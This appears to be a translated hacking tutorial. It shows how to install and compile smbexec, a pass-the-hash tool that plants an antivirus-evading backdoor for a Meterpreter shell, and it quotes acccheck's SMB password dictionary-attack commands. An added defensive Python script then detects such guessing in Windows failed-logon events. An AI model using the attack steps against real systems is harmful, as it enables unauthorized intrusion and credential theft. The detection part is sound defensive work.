Introducing the smbexec tool
smbexec is a pass-the-hash tool: given either a hash or a plaintext password for a Windows system, it lets you attack that system. It generates a backdoor, uploads it to the victim machine and runs it, and on the other side you get a Meterpreter shell. The chance of being caught by anti-virus (products such as V3) is low.
Reference links
- BT5 r3 smbexec installation: http://www.youtube.com/watch?v=ToFuZBNuolY
- Windows hacking walkthrough: http://www.securitytube.net/video/6861
Installing smbexec
Install environment: Kali Linux
# cd /opt
# git clone https://github.com/brav0hax/smbexec.git
# cd smbexec
# ./install.sh
************************************************************
 smbexec installer
 A rapid psexec style attack with samba tools
 Original Concept and Script by Brav0Hax & Purehate
 PurpleTeam Smash!
************************************************************
Please choose your OS to install smbexec
 1. Debian/Ubuntu and derivatives
 2. Red Hat or Fedora
 3. Microsoft Windows
 4. Compile smbexec binaries
 5. Exit
Choice: 1
...
...
Making all in msvscpp
make[1]: Entering directory `/tmp/smbexec-inst/libesedb-20120102/msvscpp'
make[1]: Nothing to be done for `all'.
make[1]: Leaving directory `/tmp/smbexec-inst/libesedb-20120102/msvscpp'
make[1]: Entering directory `/tmp/smbexec-inst/libesedb-20120102'
make[1]: Nothing to be done for `all-am'.
make[1]: Leaving directory `/tmp/smbexec-inst/libesedb-20120102'
[+] esedbtools have been installed...
[+] I found nmap installed on your system
[+] I found metasploit installed on your system
[*] Running 'updatedb' again because we installed some new stuff
...happy hunting!

// When the install finishes it wishes you "happy hunting". ;)
When the installation has finished, you can see that four new folders (creddump, esedbtools, NTDSXtract and smbexec) have been created under /opt, as shown below.
root@kali:/opt# ll
total 36
drwxr-xr-x  9 root root 4096 Oct 16 16:34 .
drwxr-xr-x 23 root root 4096 Oct 16 15:39 ..
drwxr-xr-x  3 root root 4096 Oct 16 16:33 creddump
drwxrwxr-x  4  500  500 4096 Oct 16 16:34 esedbtools
drwxr-xr-x  3 root root 4096 Oct 14 11:11 firmware-mod-kit
drwxr-xr-x  6 root root 4096 Oct 14 13:07 metasploit
drwxr-xr-x  4 root root 4096 Dec 14  2011 NTDSXtract
drwxr-xr-x  6 root root 4096 Oct 16 16:15 smbexec
drwxr-xr-x  7 root root 4096 Oct 14 11:10 Teeth
Compiling the Windows binaries
Next, compile the smbexec binaries: run ./install.sh again, select the corresponding menu item (4) and press Enter.
Please choose your OS to install smbexec
 1. Debian/Ubuntu and derivatives
 2. Red Hat or Fedora
 3. Microsoft Windows
 4. Compile smbexec binaries
 5. Exit
Choice: 4
This script will compile your smbexec binaries
Press any key to continue
...
...
Compiling ../nsswitch/winbind_nss_linux.c
Linking bin/shared/libnss_winbind.so
Linking bin/shared/libsamba-hostconfig.so.0.0.1
[+] smbwinexe has been compiled and moved to the progs folder...
************************************************************
 smbexec installer
 A rapid psexec style attack with samba tools
 Original Concept and Script by Brav0Hax & Purehate
 PurpleTeam Smash!
************************************************************
Please choose your OS to install smbexec
 1. Debian/Ubuntu and derivatives
 2. Red Hat or Fedora
 3. Microsoft Windows
 4. Compile smbexec binaries
 5. Exit
When compilation finishes, the installer says the binaries have been moved to the progs folder. Listing that directory shows the compiled files below.
root@kali:/opt/smbexec/progs# ll
drwxr-xr-x 2 root root     4096 Oct 16 17:01 .
drwxr-xr-x 6 root root     4096 Oct 16 16:15 ..
-rwxr-xr-x 1 root root    27858 Oct 16 16:15 cachedump.rb
-rwxr-xr-x 1 root root     1648 Oct 16 16:15 ntdspwdump.py
-rwxr-xr-x 1 root root  6656780 Oct 16 16:54 smbexeclient
-rwxr-xr-x 1 root root 10031583 Oct 16 16:58 smbwinexe
-rwxr-xr-x 1 root root   691199 Oct 16 16:15 wce.exe
Hacking Windows with smbexec
Before you can attack a Windows system with smbexec you first have to get past Windows SMB authentication, i.e. obtain a working password or hash for the target.
BT5 and Kali ship tools for this.
Using the acccheck tool
acccheck is designed as a password dictionary attack tool that tries to authenticate to the target Windows system over the SMB protocol.
Its README is reproduced below.
root@kali:/usr/share/doc/acccheck# more README.TXT
acccheck.pl - Windows SMB Password Dictionary Attack Tool
Copyright (C) 2008 Faisal Dean (Faiz)

The tool is designed as a password dictionary attack tool that targets windows authentication via the SMB protocol. It is really a wrapper script around the 'smbclient' binary, and as a result is dependent on it for its execution.

The simplest way to run the tool is as follows:

./acccheck.pl -t 10.10.10.1

This mode of execution attempts to connect to the target ADMIN$ share with the username 'Administrator' and a [BLANK] for the password.

./acccheck.pl -t 10.10.10.1 -u test -p test

This mode of execution attempts to connect to the target IPC$ share with the username 'test' and a password 'test'.

Each -t, -u and -p flags can be substituted by -T, -U and -P, where each represents an input file rather than a single input from standard in.

E.g.
./acccheck.pl -T iplist -U userfile -P passwordfile

Only use -v mode on very small dictionaries, otherwise, this has the affect of slowing the scan down to the rate the system writes to standard out.

Any username/password combinations found are written to a file called 'cracked' in the working directory.

Any comments can be emailed to me at: fmd@portcullis-security.com
Defending against SMB logon abuse (SANS, Protecting Privileged Domain Accounts: Access Tokens): http://computer-forensics.sans.org/blog/2012/03/21/protecting-privileged-domain-accounts-access-tokens
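From the defender's side, every guess acccheck makes against ADMIN$ or IPC$ lands on the target as a failed network logon, so a dictionary run is easy to spot in the logs as a burst of failures from one source address. The following detector is an added example, not code from the original post or from the smbexec/acccheck projects. It assumes a simplified pipe-delimited export of Windows Security events (timestamp, event ID, logon type, account, source address); the sample records are constructed, and the threshold and window are arbitrary starting values.

```python
"""
Flag SMB password guessing (the pattern a dictionary tool such as acccheck
produces) from Windows failed-logon events.

On the target, each failed SMB authentication is logged as Security event
4625 with Logon Type 3 (network), carrying the account tried and the source
workstation address. Many such failures from one source in a short window
against a single account is a dictionary attack; the same burst spread over
many accounts is password spraying.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample export: timestamp|event_id|logon_type|account|source_ip
# (hypothetical format, assumed for this example).
SAMPLE_EVENTS = """\
2013-10-16T17:05:00|4625|2|Administrator|-
2013-10-16T17:10:00|4625|3|Administrator|10.10.10.5
2013-10-16T17:10:03|4625|3|Administrator|10.10.10.5
2013-10-16T17:10:06|4625|3|Administrator|10.10.10.5
2013-10-16T17:10:09|4625|3|Administrator|10.10.10.5
2013-10-16T17:10:12|4625|3|Administrator|10.10.10.5
2013-10-16T17:10:15|4625|3|Administrator|10.10.10.5
2013-10-16T17:10:18|4625|3|Administrator|10.10.10.5
2013-10-16T17:10:21|4625|3|Administrator|10.10.10.5
2013-10-16T17:12:00|4625|3|jsmith|10.10.10.7
2013-10-16T17:12:30|4625|3|jsmith|10.10.10.7
2013-10-16T17:12:45|4624|3|jsmith|10.10.10.7
2013-10-16T17:20:00|4625|3|svc_backup|10.10.10.9
2013-10-16T17:20:02|4625|3|hr01|10.10.10.9
2013-10-16T17:20:04|4625|3|dev02|10.10.10.9
2013-10-16T17:20:06|4625|3|ops03|10.10.10.9
2013-10-16T17:20:08|4625|3|finance04|10.10.10.9
2013-10-16T17:20:10|4625|3|Administrator|10.10.10.9
"""


def parse_events(text):
    """Parse the pipe-delimited export into a list of event dicts."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts, event_id, logon_type, account, source_ip = line.split("|")
        events.append({
            "time": datetime.fromisoformat(ts),
            "event_id": int(event_id),
            "logon_type": int(logon_type),
            "account": account,
            "source_ip": source_ip,
        })
    return events


def find_smb_guessing(events, threshold=5, window=timedelta(seconds=60)):
    """Return one alert per source address whose failed network logons
    exceed `threshold` inside any `window`-long span.

    Interactive (type 2) failures and successful logons (4624) are ignored:
    only 4625 with logon type 3 corresponds to a rejected SMB connection.
    """
    failed = [e for e in events if e["event_id"] == 4625 and e["logon_type"] == 3]
    by_source = defaultdict(list)
    for e in failed:
        by_source[e["source_ip"]].append(e)

    alerts = []
    for src, evs in by_source.items():
        evs.sort(key=lambda e: e["time"])
        best = None          # (count, start_index, end_index) of the densest window
        j = 0
        for i in range(len(evs)):
            # Advance j to the first event outside the window starting at i.
            while j < len(evs) and evs[j]["time"] - evs[i]["time"] <= window:
                j += 1
            count = j - i
            if count >= threshold and (best is None or count > best[0]):
                best = (count, i, j)
        if best is None:
            continue
        count, i, j = best
        accounts = sorted({e["account"] for e in evs[i:j]})
        alerts.append({
            "source_ip": src,
            "failures": count,
            "accounts": accounts,
            # One account hammered with many passwords = dictionary attack;
            # many accounts from one source = spraying.
            "pattern": "dictionary" if len(accounts) == 1 else "spray",
            "first": evs[i]["time"],
            "last": evs[j - 1]["time"],
        })
    return alerts


if __name__ == "__main__":
    for alert in find_smb_guessing(parse_events(SAMPLE_EVENTS)):
        print(f"{alert['source_ip']}: {alert['failures']} failed network logons "
              f"({alert['pattern']}) against {', '.join(alert['accounts'])} "
              f"between {alert['first']:%H:%M:%S} and {alert['last']:%H:%M:%S}")
```

Run against the constructed sample, 10.10.10.5 is reported as a dictionary attack on Administrator (8 failures in 21 seconds) and 10.10.10.9 as a spray across six accounts, while the two typos from 10.10.10.7 stay below the threshold. In a real deployment the same logic applies to events pulled from the Security log or a SIEM; an account lockout policy and restricting who may reach ADMIN$ and IPC$ over the network (see the SANS link above) reduce what a dictionary run can achieve in the first place.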